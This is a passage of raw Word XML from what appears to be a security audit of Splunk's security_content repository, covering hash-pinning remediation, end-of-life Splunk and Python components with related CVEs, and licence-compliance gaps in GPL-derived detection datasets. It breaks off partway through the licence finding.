        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>test_data_caches:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- base_url: https://media.githubusercontent.com/media/splunk/attack_data/&lt;commit-sha&gt;/</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base_directory_name: external_repos/attack_data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/unit-testing.yml:64 - pin the image used by CI</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docker run -d --platform linux/amd64 ... --name splunk splunk/splunk:10.0.11@sha256:&lt;digest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/appinspect.yml:41 - verify the downloaded previous release</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curl --fail --location -o DA-ESS-ContentUpdate-latest.tar.gz https://github.com/splunk/security_content/releases/latest/download/DA-ESS-ContentUpdate-latest.tar.gz</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curl --fail --location -o DA-ESS-ContentUpdate-latest.tar.gz.sha256 https://github.com/splunk/security_content/releases/latest/download/DA-ESS-ContentUpdate-latest.tar.gz.sha256</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sha256sum --check DA-ESS-ContentUpdate-latest.tar.gz.sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Operational fix without code changes: enable S3 Object Lock / versioning + bucket policy denying overwrite on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack-range-appbinaries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bucket, delete the mutable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Latest/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prefix in favour of versioned object names (the repo already uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;name&gt;_&lt;version&gt;.tgz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for 37/38 apps), and have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> publish </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SHA256SUMS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that contentctl-ng verifies. Why it works: a digest/hash pin converts "trust the origin" into "trust the bytes", so a compromised bucket or registry cannot change what is executed without a visible repo diff. Reproducibility of tests improves as a side effect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-494 Download of Code Without Integrity Check; CWE-829 Inclusion of Functionality from Untrusted Control Sphere; CWE-1104 Use of Unmaintained Third Party Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SR-4 Provenance, SR-11 Component Authenticity, SI-7 Software, Firmware, and Information Integrity, CM-8 System Component Inventory, SA-22 Unsupported System Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security, GV.SC Govern - Cybersecurity Supply Chain Risk Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.19 Installation of software on operational systems, A.5.21 Managing information security in the ICT supply chain, A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / File Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-04 — End-of-life components: Splunk 9.3 test image (EOL 2026-07-24), Python 3.10 CI runtime (EOL 2026-10-01), legacy SOAR exports, notebook stacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.6). Exploitability: Lifecycle hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contentctl.yml:25; .github/workflows/update_splunk_tas.yml:21; playbooks/*.json (coa.version 4.10.x/5.x); deprecated/notebooks/*.ipynb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t>: End-of-life platform and runtime components: Splunk Enterprise 9.3 test image (EOL 2026-07-24), Python 3.10 CI runtime (EOL 2026-10-01), legacy SOAR 4.10/5.x playbook exports, notebooks on torch 1.11/numpy 1.19/Python 3.8-3.9</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24</w:t>
        <w:tab/>
        <w:t>container_settings:</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25</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  full_image_path: registry.hub.docker.com/splunk/splunk:9.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: endoflife.date (verified) lists Splunk 9.3 as released 2024-07-24 with EOL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2026-07-24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; Docker Hub shows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tag was last rebuilt 2026-07-01 (9.3.14) and will receive no further security fixes, while the current line is 10.6.0. Testing detections against an EOL platform means SPL behaviour, field extractions and REST APIs validated in CI diverge from what customers on 9.4/10.x run, and any Splunk-side CVE in the test image stays unpatched on the shared runner. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_splunk_tas.yml:21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pins Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which reached EOL on 2026-10-01 (verified); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/setup-python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will keep serving it, but no security patches will arrive. The SOAR playbook corpus was exported from 17 different SOAR builds back to 4.10.0 (2020-era) - these legacy exports (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>schema: 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python_version: "3"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) rely on behaviours of EOL platforms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[TK: SOAR 4.10 and 5.x are out of support]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The deprecated DSDL notebooks pin a scientific stack that OSV flags with 30 advisories for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch 1.11.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (incl. CVE-2025-32434 - RCE via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch.load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which these notebooks call at e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detect_dns_data_exfiltration...ipynb:216,462</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and 2 CVEs for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>numpy 1.19.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; they are explicitly deprecated and not shipped in the app, so this part is informational. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Platform-level; no direct input path in this repo. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable from repo inputs (defense-in-depth / lifecycle hygiene)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl https://endoflife.date/api/splunk.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cycle 9.3 ... eol 2026-07-24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl https://endoflife.date/api/python.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cycle 3.10 ... eol 2026-10-01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aggregation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>coa.version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/*.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (output in Section (i)-e). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># contentctl.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>container_settings:</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full_image_path: registry.hub.docker.com/splunk/splunk:10.0.11@sha256:&lt;digest&gt;   # 10.0 supported to 2027-07-28; or 9.4.16 (to 2026-12-16)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/update_splunk_tas.yml</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 uses: actions/setup-python@ece7cb06caefa5fff74198d8649806c4678c61a1 # v6</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with:</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python-version: '3.13'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">For SOAR: re-export the 8 schema-4 / 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python_version: "3"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks from a supported SOAR 6.x and set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python_version: "3.13"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consistently; for notebooks: either delete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated/notebooks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or add a header cell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># DEPRECATED - requires DSDL &gt;= 5.x; do not run on torch &lt; 2.6 (CVE-2025-32434)</w:t>
      </w:r>
      <w:r>
        <w:t>. Add an EOL check to CI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>endoflife.date</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>xeol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) so pins are flagged before they lapse. No regression: 10.0.x is the documented ESCU 6.x target platform; Python 3.13 runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unchanged (verified that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests.packages.urllib3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> still imports on 3.14/requests 2.34.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1395 Dependency on Vulnerable Third-Party Component. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1190 Exploit Public-Facing Application, T1203 Exploitation for Client Execution, T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-22 Unsupported System Components, SI-2 Flaw Remediation, CM-8 System Component Inventory. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.AM Identify - Asset Management, PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.8 Management of technical vulnerabilities, A.8.19 Installation of software on operational systems, A.5.21 Managing information security in the ICT supply chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-06 — Licence compliance gaps: GPL-3.0-derived datasets redistributed under Apache-2.0 without notices; no NOTICE file; build tool licence unknown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (no CVSS score (informational)). Exploitability: Legal / compliance exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LICENSE; lookups/csv/lolbas_file_path.*, hijacklibs*.*, loldrivers.*, remote_access_software.csv, dynamic_dns_providers_default.csv; requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t>: License compliance gaps - copyleft (GPL-3.0) third-party datasets redistributed in an Apache-2.0 app without notices; Apache-2.0 and MITRE data without required attribution; no NOTICE file; build tool with unknown license</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>lookups/csv/lolbas_file_path.yml</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8</w:t>
        <w:tab/>
        <w:t>description: A list of LOLBAS and their file path used in determining if a script or binary is valid on windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>lookups/csv/sslbl_ssl_certificate_blacklist.yml</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8</w:t>
        <w:tab/>
        <w:t>description: abuse.ch SSLBL SSL Certificate Blacklist (SHA1 Fingerprints)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The project is Apache-2.0 and the built </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DA-ESS-ContentUpdate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> app redistributes several lookups whose content is, by name and column structure, derived from external projects. Upstream licenses verified from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>raw.githubusercontent.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on 2026-10-06:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LOLBAS-Project/LOLBAS - GPL-3.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lolbas_file_path.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: file names/paths/descriptions match the LOLBAS YAML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Full_Path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data; derivation is probable but not confirmed row-by-row).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wietze/HijackLibs - GPL-3.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hijacklibs.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hijacklibs_loaded.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ttp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
